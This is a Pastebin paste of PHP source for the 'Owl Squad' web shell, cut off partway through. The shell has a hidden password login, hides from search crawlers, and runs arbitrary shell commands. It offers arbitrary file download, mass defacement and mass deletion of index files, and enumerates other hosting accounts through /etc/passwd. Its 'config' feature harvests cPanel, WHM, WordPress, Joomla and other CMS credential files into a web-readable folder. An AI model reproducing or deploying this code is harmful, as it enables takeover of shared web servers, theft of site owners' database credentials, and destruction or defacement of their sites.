Guest User

Untitled

a guest
Feb 12th, 2017
118
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 87.22 KB | None | 0 0
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  13. $auth_pass = "a31685eab798f369138feb30f47b2c7b"; // default: armvxo
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21. header('HTTP/1.0 404 Not Found');
  22. exit;
  23. }
  24. }
  25.  
  26. function login_shell() {
  27. ?>
  28. <html>
  29. <head>
  30. <title>Owl Squad</title>
  31. <style type="text/css">
  32. body{
  33. background: url(http://img03.deviantart.net/efc3/i/2010/112/4/5/tare_panda_by_pixel_sage.png) no-repeat center center fixed; #fff;
  34. -webkit-background-size: cover;
  35. -moz-background-size: cover;
  36. -o-background-size: cover;
  37. background-size: cover;
  38. background-attachment:fixed;
  39. }
  40. input[type=password] {
  41. width: 250px;
  42. height: 25px;
  43. color: white;
  44. background: transparent;
  45. border: 1px dotted transparent;
  46. padding: 5px;
  47. margin-left: 20px;
  48. text-align: center;
  49. }
  50. </style>
  51. </head>
  52. <center>
  53. <form method="post">
  54. <input type="password" name="pass">
  55. </form>
  56. <?php
  57. exit;
  58. }
  59. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  60. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  61. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  62. else
  63. login_shell();
  64. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  65. @ob_clean();
  66. $file = $_GET['file'];
  67. header('Content-Description: File Transfer');
  68. header('Content-Type: application/octet-stream');
  69. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  70. header('Expires: 0');
  71. header('Cache-Control: must-revalidate');
  72. header('Pragma: public');
  73. header('Content-Length: ' . filesize($file));
  74. readfile($file);
  75. exit;
  76. }
  77. ?>
  78. <html>
  79. <head>
  80. <title>Owl Squad</title>
  81. <meta name='author' content='Owl Squad'>
  82. <meta charset="UTF-8">
  83. <link href="http://bootswatch.com/flatly/bootstrap.min.css" rel="stylesheet">
  84. <script ></script>
  85. <style type='text/css'>
  86. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  87. body{
  88. background: url(http://img03.deviantart.net/efc3/i/2010/112/4/5/tare_panda_by_pixel_sage.png) no-repeat center center fixed; #fff;
  89. -webkit-background-size: cover;
  90. -moz-background-size: cover;
  91. -o-background-size: cover;
  92. background-size: cover;
  93. background-attachment:fixed;
  94. color:white;
  95. font-size:13px;
  96. font-family: "Lato","Helvetica Neue",Helvetica,Arial,sans-serif;
  97. }
  98. h1{
  99. color:#18BC9C;
  100. }
  101. li {
  102. display: inline;
  103. margin: 5px;
  104. padding: 5px;
  105. }
  106. table, th, td {
  107. border-collapse:collapse;
  108. font-family: Tahoma, Geneva, sans-serif;
  109. background: transparent;
  110. font-family: 'Ubuntu';
  111. font-size: 13px;
  112. padding: 5px;
  113. }
  114. .table_home, .td_home {
  115. border: 1px solid #18BC9C;
  116. }
  117. .td_home:hover {
  118. background:grey;
  119. }
  120. .th_home{
  121. padding: 5px;
  122. border: 1px solid #18BC9C;
  123. background:#18BC9C;
  124. }
  125. th {
  126. padding: 15px;
  127. }
  128. a {
  129. color: #ffffff;
  130. }
  131.  
  132. input[type=text], input[type=password]{
  133. background: transparent;
  134. color: white;
  135. border: 1px solid #18BC9C;
  136. margin: 5px auto;
  137. padding-left: 5px;
  138. font-family: 'Ubuntu';
  139. font-size: 13px;
  140. }
  141. input[type=submit]{
  142. color: white;
  143. border: 1px solid #18BC9C;
  144. margin: 5px;
  145. padding: 3px 15px;
  146. font-family: 'Ubuntu';
  147. font-size: 13px;
  148. }
  149. textarea {
  150. border: 1px solid #18BC9C;
  151. width: 100%;
  152. height: 400px;
  153. padding-left: 5px;
  154. margin: 10px auto;
  155. resize: none;
  156. background: transparent;
  157. color: #ffffff;
  158. font-family: 'Ubuntu';
  159. font-size: 13px;
  160. }
  161. select {
  162. width: 152px;
  163. background: #000000;
  164. color: #18BC9C;
  165. border: 1px solid #ffffff;
  166. margin: 5px auto;
  167. padding-left: 5px;
  168. font-family: 'Ubuntu';
  169. font-size: 13px;
  170. }
  171. option:hover {
  172. background: #18BC9C;
  173. color: #000000;
  174. }
  175. </style>
  176. </head>
  177. <?php
  178. ###############################################################################
  179. // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
  180. // Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
  181. // Tapi Selebihnya, itu hasil kreasi Owl Squad sendiri.
  182. // Tanpa kalian kita tidak akan BESAR seperti sekarang.
  183. // Greetz: All Member IndoXploit. & all my friends.
  184. ###############################################################################
  185. function w($dir,$perm) {
  186. if(!is_writable($dir)) {
  187. return "<font color=red>".$perm."</font>";
  188. } else {
  189. return "<font color=#18BC9C>".$perm."</font>";
  190. }
  191. }
  192. function r($dir,$perm) {
  193. if(!is_readable($dir)) {
  194. return "<font color=red>".$perm."</font>";
  195. } else {
  196. return "<font color=#18BC9C>".$perm."</font>";
  197. }
  198. }
  199. function exe($cmd) {
  200. if(function_exists('system')) {
  201. @ob_start();
  202. @system($cmd);
  203. $buff = @ob_get_contents();
  204. @ob_end_clean();
  205. return $buff;
  206. } elseif(function_exists('exec')) {
  207. @exec($cmd,$results);
  208. $buff = "";
  209. foreach($results as $result) {
  210. $buff .= $result;
  211. } return $buff;
  212. } elseif(function_exists('passthru')) {
  213. @ob_start();
  214. @passthru($cmd);
  215. $buff = @ob_get_contents();
  216. @ob_end_clean();
  217. return $buff;
  218. } elseif(function_exists('shell_exec')) {
  219. $buff = @shell_exec($cmd);
  220. return $buff;
  221. }
  222. }
  223. function perms($file){
  224. $perms = fileperms($file);
  225. if (($perms & 0xC000) == 0xC000) {
  226. // Socket
  227. $info = 's';
  228. } elseif (($perms & 0xA000) == 0xA000) {
  229. // Symbolic Link
  230. $info = 'l';
  231. } elseif (($perms & 0x8000) == 0x8000) {
  232. // Regular
  233. $info = '-';
  234. } elseif (($perms & 0x6000) == 0x6000) {
  235. // Block special
  236. $info = 'b';
  237. } elseif (($perms & 0x4000) == 0x4000) {
  238. // Directory
  239. $info = 'd';
  240. } elseif (($perms & 0x2000) == 0x2000) {
  241. // Character special
  242. $info = 'c';
  243. } elseif (($perms & 0x1000) == 0x1000) {
  244. // FIFO pipe
  245. $info = 'p';
  246. } else {
  247. // Unknown
  248. $info = 'u';
  249. }
  250. // Owner
  251. $info .= (($perms & 0x0100) ? 'r' : '-');
  252. $info .= (($perms & 0x0080) ? 'w' : '-');
  253. $info .= (($perms & 0x0040) ?
  254. (($perms & 0x0800) ? 's' : 'x' ) :
  255. (($perms & 0x0800) ? 'S' : '-'));
  256. // Group
  257. $info .= (($perms & 0x0020) ? 'r' : '-');
  258. $info .= (($perms & 0x0010) ? 'w' : '-');
  259. $info .= (($perms & 0x0008) ?
  260. (($perms & 0x0400) ? 's' : 'x' ) :
  261. (($perms & 0x0400) ? 'S' : '-'));
  262. // World
  263. $info .= (($perms & 0x0004) ? 'r' : '-');
  264. $info .= (($perms & 0x0002) ? 'w' : '-');
  265. $info .= (($perms & 0x0001) ?
  266. (($perms & 0x0200) ? 't' : 'x' ) :
  267. (($perms & 0x0200) ? 'T' : '-'));
  268. return $info;
  269. }
  270. function hdd($s) {
  271. if($s >= 1073741824)
  272. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  273. elseif($s >= 1048576)
  274. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  275. elseif($s >= 1024)
  276. return sprintf('%1.2f',$s / 1024 ) .' KB';
  277. else
  278. return $s .' B';
  279. }
  280. function ambilKata($param, $kata1, $kata2){
  281. if(strpos($param, $kata1) === FALSE) return FALSE;
  282. if(strpos($param, $kata2) === FALSE) return FALSE;
  283. $start = strpos($param, $kata1) + strlen($kata1);
  284. $end = strpos($param, $kata2, $start);
  285. $return = substr($param, $start, $end - $start);
  286. return $return;
  287. }
  288. function getsource($url) {
  289. $curl = curl_init($url);
  290. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  291. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  292. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  293. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  294. $content = curl_exec($curl);
  295. curl_close($curl);
  296. return $content;
  297. }
  298. function bing($dork) {
  299. $npage = 1;
  300. $npages = 30000;
  301. $allLinks = array();
  302. $lll = array();
  303. while($npage <= $npages) {
  304. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  305. if($x) {
  306. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  307. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  308. $npage = $npage + 10;
  309. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  310. } else break;
  311. }
  312. $URLs = array();
  313. foreach($allLinks as $url){
  314. $exp = explode("/", $url);
  315. $URLs[] = $exp[2];
  316. }
  317. $array = array_filter($URLs);
  318. $array = array_unique($array);
  319. $sss = count(array_unique($array));
  320. foreach($array as $domain) {
  321. echo $domain."\n";
  322. }
  323. }
  324. function reverse($url) {
  325. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  326. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  327. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  328. curl_setopt($ch, CURLOPT_HEADER, 0);
  329. curl_setopt($ch, CURLOPT_POST, 1);
  330. $resp = curl_exec($ch);
  331. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  332. $array = explode(",,", $resp);
  333. unset($array[0]);
  334. foreach($array as $lnk) {
  335. $lnk = "http://$lnk";
  336. $lnk = str_replace(",", "", $lnk);
  337. echo $lnk."\n";
  338. ob_flush();
  339. flush();
  340. }
  341. curl_close($ch);
  342. }
  343. if(get_magic_quotes_gpc()) {
  344. function idx_ss($array) {
  345. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  346. }
  347. $_POST = idx_ss($_POST);
  348. $_COOKIE = idx_ss($_COOKIE);
  349. }
  350.  
  351. if(isset($_GET['dir'])) {
  352. $dir = $_GET['dir'];
  353. chdir($dir);
  354. } else {
  355. $dir = getcwd();
  356. }
  357. $kernel = php_uname();
  358. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  359. $dir = str_replace("\\","/",$dir);
  360. $scdir = explode("/", $dir);
  361. $freespace = hdd(disk_free_space("/"));
  362. $total = hdd(disk_total_space("/"));
  363. $used = $total - $freespace;
  364. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=#18BC9C>OFF</font>";
  365. $ds = @ini_get("disable_functions");
  366. $mysql = (function_exists('mysql_connect')) ? "<font color=#18BC9C>ON</font>" : "<font color=red>OFF</font>";
  367. $curl = (function_exists('curl_version')) ? "<font color=#18BC9C>ON</font>" : "<font color=red>OFF</font>";
  368. $wget = (exe('wget --help')) ? "<font color=#18BC9C>ON</font>" : "<font color=red>OFF</font>";
  369. $perl = (exe('perl --help')) ? "<font color=#18BC9C>ON</font>" : "<font color=red>OFF</font>";
  370. $python = (exe('python --help')) ? "<font color=#18BC9C>ON</font>" : "<font color=red>OFF</font>";
  371. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=#18BC9C>NONE</font>";
  372. if(!function_exists('posix_getegid')) {
  373. $user = @get_current_user();
  374. $uid = @getmyuid();
  375. $gid = @getmygid();
  376. $group = "?";
  377. } else {
  378. $uid = @posix_getpwuid(posix_geteuid());
  379. $gid = @posix_getgrgid(posix_getegid());
  380. $user = $uid['name'];
  381. $uid = $uid['uid'];
  382. $group = $gid['name'];
  383. $gid = $gid['gid'];
  384. }
  385. echo "System: <font color=#18BC9C>".$kernel."</font><br>";
  386. echo "User: <font color=#18BC9C>".$user."</font> (".$uid.") Group: <font color=#18BC9C>".$group."</font> (".$gid.")<br>";
  387. echo "Server IP: <font color=#18BC9C>".$ip."</font> | Your IP: <font color=#18BC9C>".$_SERVER['REMOTE_ADDR']."</font><br>";
  388. echo "HDD: <font color=#18BC9C>$used</font> / <font color=#18BC9C>$total</font> ( Free: <font color=#18BC9C>$freespace</font> )<br>";
  389. echo "Safe Mode: $sm<br>";
  390. echo "Disable Functions: $show_ds<br>";
  391. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  392.  
  393. echo "<hr>";
  394. echo "<center>";
  395. echo "<ul>";
  396. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?'>Home</a></li>";
  397. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=upload'>Upload</a> </li>";
  398. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='#com'>Command</a> </li>";
  399. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=mass_deface'>Mass Deface</a></li>";
  400. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=mass_delete'>Mass Delete</a></li>";
  401. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=config'>Config</a></li>";
  402. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=jumping'>Jumping</a></li>";
  403. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=cpanel'>CPanel Crack</a></li>";
  404. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=smtp'>SMTP Grabber</a></li>";
  405. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=zoneh'>Zone-H</a></li>";
  406. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=cgi'>CGI Telnet</a></li>";
  407. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=network'>network</a></li>";
  408. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=adminer'>Adminer</a></li><br>";
  409. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=fake_root'>Fake Root</a></li>";
  410. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a></li>";
  411. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a></li>";
  412. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a></li>";
  413. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a></li>";
  414. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a></li>";
  415. echo "<a style=margin:3px; class='btn btn-success btn-sm' href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a></li>";
  416. echo "<a style=margin:3px; class='btn btn-success btn-sm' style='color: red;' href='?logout=true'>Logout</a></li>";
  417. echo "</ul>";
  418. echo "</center>";
  419. echo "<hr>";
  420. echo "Current DIR: ";
  421. foreach($scdir as $c_dir => $cdir) {
  422. echo "<a href='?dir=";
  423. for($i = 0; $i <= $c_dir; $i++) {
  424. echo "$scdir[$i]";
  425. if($i != $c_dir) {
  426. echo "/";
  427. }
  428. }
  429. echo "'>$cdir</a>/";
  430. }
  431. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ] <br>";
  432. if($_GET['logout'] == true) {
  433. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  434. echo "<script>window.location='?';</script>";
  435. } elseif($_GET['do'] == 'upload') {
  436. echo "<center>";
  437. if($_POST['upload']) {
  438. if($_POST['tipe_upload'] == 'biasa') {
  439. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  440. $act = "<font color=#18BC9C>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  441. } else {
  442. $act = "<font color=red>failed to upload file</font>";
  443. }
  444. } else {
  445. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  446. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  447. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  448. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  449. $act = "<font color=#18BC9C>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  450. } else {
  451. $act = "<font color=red>failed to upload file</font>";
  452. }
  453. } else {
  454. $act = "<font color=red>failed to upload file</font>";
  455. }
  456. }
  457. }
  458. echo "<h1> Upload File </h1>:
  459. <form method='post' enctype='multipart/form-data'>
  460. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")."
  461. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")."<br>
  462. <input type='file' name='ix_file'>
  463. <input type='submit' value='upload' name='upload' class='btn btn-success btn-sm'>
  464. </form>";
  465. echo $act;
  466. echo "</center>";
  467.  
  468. } elseif($_GET['do'] == 'mass_deface') {
  469. function sabun_massal($dir,$namafile,$isi_script) {
  470. if(is_writable($dir)) {
  471. $dira = scandir($dir);
  472. foreach($dira as $dirb) {
  473. $dirc = "$dir/$dirb";
  474. $lokasi = $dirc.'/'.$namafile;
  475. if($dirb === '.') {
  476. file_put_contents($lokasi, $isi_script);
  477. } elseif($dirb === '..') {
  478. file_put_contents($lokasi, $isi_script);
  479. } else {
  480. if(is_dir($dirc)) {
  481. if(is_writable($dirc)) {
  482. echo "[<font color=#18BC9C>DONE</font>] $lokasi<br>";
  483. file_put_contents($lokasi, $isi_script);
  484. $idx = sabun_massal($dirc,$namafile,$isi_script);
  485. }
  486. }
  487. }
  488. }
  489. }
  490. }
  491. function sabun_biasa($dir,$namafile,$isi_script) {
  492. if(is_writable($dir)) {
  493. $dira = scandir($dir);
  494. foreach($dira as $dirb) {
  495. $dirc = "$dir/$dirb";
  496. $lokasi = $dirc.'/'.$namafile;
  497. if($dirb === '.') {
  498. file_put_contents($lokasi, $isi_script);
  499. } elseif($dirb === '..') {
  500. file_put_contents($lokasi, $isi_script);
  501. } else {
  502. if(is_dir($dirc)) {
  503. if(is_writable($dirc)) {
  504. echo "[<font color=#18BC9C>DONE</font>] $dirb/$namafile<br>";
  505. file_put_contents($lokasi, $isi_script);
  506. }
  507. }
  508. }
  509. }
  510. }
  511. }
  512. if($_POST['start']) {
  513. if($_POST['tipe_sabun'] == 'mahal') {
  514. echo "<div style='margin: 5px auto; padding: 5px'>";
  515. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  516. echo "</div>";
  517. } elseif($_POST['tipe_sabun'] == 'murah') {
  518. echo "<div style='margin: 5px auto; padding: 5px'>";
  519. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  520. echo "</div>";
  521. }
  522. } else {
  523. echo "<center>";
  524. echo "<form method='post'>
  525. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  526. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  527. <font style='text-decoration: underline;'>Folder:</font><br>
  528. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  529. <font style='text-decoration: underline;'>Filename:</font><br>
  530. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  531. <font style='text-decoration: underline;'>Index File:</font><br>
  532. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
  533. <input type='submit' name='start' value='Mass Deface' style='width: 450px;' class='btn btn-success btn-sm'>
  534. </form></center>";
  535. }
  536. } elseif($_GET['do'] == 'mass_delete') {
  537. function hapus_massal($dir,$namafile) {
  538. if(is_writable($dir)) {
  539. $dira = scandir($dir);
  540. foreach($dira as $dirb) {
  541. $dirc = "$dir/$dirb";
  542. $lokasi = $dirc.'/'.$namafile;
  543. if($dirb === '.') {
  544. if(file_exists("$dir/$namafile")) {
  545. unlink("$dir/$namafile");
  546. }
  547. } elseif($dirb === '..') {
  548. if(file_exists("".dirname($dir)."/$namafile")) {
  549. unlink("".dirname($dir)."/$namafile");
  550. }
  551. } else {
  552. if(is_dir($dirc)) {
  553. if(is_writable($dirc)) {
  554. if(file_exists($lokasi)) {
  555. echo "[<font color=#18BC9C>DELETED</font>] $lokasi<br>";
  556. unlink($lokasi);
  557. $idx = hapus_massal($dirc,$namafile);
  558. }
  559. }
  560. }
  561. }
  562. }
  563. }
  564. }
  565. if($_POST['start']) {
  566. echo "<div style='margin: 5px auto; padding: 5px'>";
  567. hapus_massal($_POST['d_dir'], $_POST['d_file']);
  568. echo "</div>";
  569. } else {
  570. echo "<center>";
  571. echo "<form method='post'>
  572. <font style='text-decoration: underline;'>Folder:</font><br>
  573. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  574. <font style='text-decoration: underline;'>Filename:</font><br>
  575. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  576. <input type='submit' name='start' value='Mass Delete' style='width: 450px;' class='btn btn-success btn-sm'>
  577. </form></center>";
  578. }
  579. } elseif($_GET['do'] == 'config') {
  580. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  581. $idx = mkdir("idx_config", 0777);
  582. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  583. $htc = fopen("idx_config/.htaccess","w");
  584. fwrite($htc, $isi_htc);
  585. while($passwd = fgets($etc)) {
  586. if($passwd == "" || !$etc) {
  587. echo "<font color=red>Can't read /etc/passwd</font>";
  588. } else {
  589. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  590. foreach($user_config[1] as $user_idx) {
  591. $user_config_dir = "/home/$user_idx/public_html/";
  592. if(is_readable($user_config_dir)) {
  593. $grab_config = array(
  594. "/home/$user_idx/.my.cnf" => "cpanel",
  595. "/home/$user_idx/.accesshash" => "WHM-accesshash",
  596. "/home/$user_idx/public_html/po-content/config.php" => "Popoji",
  597. "/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
  598. "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
  599. "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
  600. "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  601. "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
  602. "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
  603. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
  604. "/home/$user_idx/public_html/forum/config.php" => "phpBB",
  605. "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
  606. "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
  607. "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
  608. "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
  609. "/home/$user_idx/public_html/configuration.php" => "Joomla",
  610. "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
  611. "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
  612. "/home/$user_idx/public_html/wp-config.php" => "WordPress",
  613. "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
  614. "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
  615. "/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
  616. foreach($grab_config as $config => $nama_config) {
  617. $ambil_config = file_get_contents($config);
  618. if($ambil_config == '') {
  619. } else {
  620. $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
  621. fputs($file_config,$ambil_config);
  622. }
  623. }
  624. }
  625. }
  626. }
  627. }
  628. echo "<center><a href='?dir=$dir/idx_config'><font color=#18BC9C>Done</font></a></center>";
  629. } elseif($_GET['do'] == 'jumping') {
  630. $i = 0;
  631. echo "<div class='margin: 5px auto;'>";
  632. if(preg_match("/hsphere/", $dir)) {
  633. $urls = explode("\r\n", $_POST['url']);
  634. if(isset($_POST['jump'])) {
  635. echo "<pre>";
  636. foreach($urls as $url) {
  637. $url = str_replace(array("http://","www."), "", strtolower($url));
  638. $etc = "/etc/passwd";
  639. $f = fopen($etc,"r");
  640. while($gets = fgets($f)) {
  641. $pecah = explode(":", $gets);
  642. $user = $pecah[0];
  643. $dir_user = "/hsphere/local/home/$user";
  644. if(is_dir($dir_user) === true) {
  645. $url_user = $dir_user."/".$url;
  646. if(is_readable($url_user)) {
  647. $i++;
  648. $jrw = "[<font color=#18BC9C>R</font>] <a href='?dir=$url_user'><font color=#18BC9C>$url_user</font></a>";
  649. if(is_writable($url_user)) {
  650. $jrw = "[<font color=#18BC9C>RW</font>] <a href='?dir=$url_user'><font color=#18BC9C>$url_user</font></a>";
  651. }
  652. echo $jrw."<br>";
  653. }
  654. }
  655. }
  656. }
  657. if($i == 0) {
  658. } else {
  659. echo "<br>Total ada ".$i." Kamar di ".$ip;
  660. }
  661. echo "</pre>";
  662. } else {
  663. echo '<center>
  664. <form method="post">
  665. List Domains: <br>
  666. <textarea name="url" style="width: 500px; height: 250px;">';
  667. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  668. while($getss = fgets($fp)) {
  669. echo $getss;
  670. }
  671. echo '</textarea><br>
  672. <input type="submit" value="Jumping" name="jump" class="btn btn-success btn-sm" style="width: 500px; height: 25px;">
  673. </form></center>';
  674. }
  675. } elseif(preg_match("/vhosts/", $dir)) {
  676. $urls = explode("\r\n", $_POST['url']);
  677. if(isset($_POST['jump'])) {
  678. echo "<pre>";
  679. foreach($urls as $url) {
  680. $web_vh = "/var/www/vhosts/$url/httpdocs";
  681. if(is_dir($web_vh) === true) {
  682. if(is_readable($web_vh)) {
  683. $i++;
  684. $jrw = "[<font color=#18BC9C>R</font>] <a href='?dir=$web_vh'><font color=#18BC9C>$web_vh</font></a>";
  685. if(is_writable($web_vh)) {
  686. $jrw = "[<font color=#18BC9C>RW</font>] <a href='?dir=$web_vh'><font color=#18BC9C>$web_vh</font></a>";
  687. }
  688. echo $jrw."<br>";
  689. }
  690. }
  691. }
  692. if($i == 0) {
  693. } else {
  694. echo "<br>Total ada ".$i." Kamar di ".$ip;
  695. }
  696. echo "</pre>";
  697. } else {
  698. echo '<center>
  699. <form method="post">
  700. List Domains: <br>
  701. <textarea name="url" style="width: 500px; height: 250px;">';
  702. bing("ip:$ip");
  703. echo '</textarea><br>
  704. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  705. </form></center>';
  706. }
  707. } else {
  708. echo "<pre>";
  709. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  710. while($passwd = fgets($etc)) {
  711. if($passwd == '' || !$etc) {
  712. echo "<font color=red>Can't read /etc/passwd</font>";
  713. } else {
  714. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  715. foreach($user_jumping[1] as $user_idx_jump) {
  716. $user_jumping_dir = "/home/$user_idx_jump/public_html";
  717. if(is_readable($user_jumping_dir)) {
  718. $i++;
  719. $jrw = "[<font color=#18BC9C>R</font>] <a href='?dir=$user_jumping_dir'><font color=#18BC9C>$user_jumping_dir</font></a>";
  720. if(is_writable($user_jumping_dir)) {
  721. $jrw = "[<font color=#18BC9C>RW</font>] <a href='?dir=$user_jumping_dir'><font color=#18BC9C>$user_jumping_dir</font></a>";
  722. }
  723. echo $jrw;
  724. if(function_exists('posix_getpwuid')) {
  725. $domain_jump = file_get_contents("/etc/named.conf");
  726. if($domain_jump == '') {
  727. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  728. } else {
  729. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  730. foreach($domains_jump[1] as $dj) {
  731. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  732. $user_jumping_url = $user_jumping_url['name'];
  733. if($user_jumping_url == $user_idx_jump) {
  734. echo " => ( <u>$dj</u> )<br>";
  735. break;
  736. }
  737. }
  738. }
  739. } else {
  740. echo "<br>";
  741. }
  742. }
  743. }
  744. }
  745. }
  746. if($i == 0) {
  747. } else {
  748. echo "<br>Total ada ".$i." Kamar di ".$ip;
  749. }
  750. echo "</pre>";
  751. }
  752. echo "</div>";
  753. } elseif($_GET['do'] == 'auto_edit_user') {
  754. if($_POST['hajar']) {
  755. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  756. echo "username atau password harus lebih dari 6 karakter";
  757. } else {
  758. $user_baru = $_POST['user_baru'];
